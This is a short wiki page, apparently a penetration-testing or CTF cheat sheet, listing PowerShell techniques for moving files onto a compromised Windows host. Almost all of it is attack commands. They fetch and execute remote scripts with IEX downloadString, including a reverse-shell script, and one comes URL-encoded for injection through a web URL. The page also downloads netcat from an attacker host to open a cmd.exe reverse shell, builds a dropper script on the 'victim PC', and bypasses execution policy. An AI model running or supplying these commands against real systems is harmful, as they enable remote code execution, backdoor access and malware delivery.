-
Notifications
You must be signed in to change notification settings - Fork 14
File transfer PowerShell
lethanhtung01011980 edited this page Apr 23, 2020
·
14 revisions
- For Win7, 2008 and above
- Support PowerShell
Normally use in remote execution
- Download file to the exact folder:
powershell.exe (New-Object System.Net.WebClient).DownloadFile('https://example.com/archive.zip', 'C:\Windows\Temp\archive.zip')
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://<script>')"
powershell full path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe
- In web URL:
C%3a\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe+IEX(New-Object+Net.Webclient).downloadString('http%3a//10.10.14.15/Invoke-PowerShellTcp.ps1')
If already in Powershell cmd
- To run
"IEX(New-Object Net.WebClient).downloadString('http:///<script>')"
- powershell “wget http://attacker_ip/nc64.exe -OutFile nc64.exe”
nc64.exe attacker-ip <PORT> -e cmd.exe
To create a file "wget.ps1" in victim PC
- echo $storageDir = $pwd > wget.ps1
- echo $webclient = New-Object System.Net.WebClient >>wget.ps1
- echo $url = "http://attacker_ip/nc.exe" >>wget.ps1
- echo $file = "new-exploit.exe" >>wget.ps1
- echo $webclient.DownloadFile($url,$file) >>wget.ps1
To run script to download file
- powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
- To copy content of the above file in a non-interactive remote shell
- To execute and download a file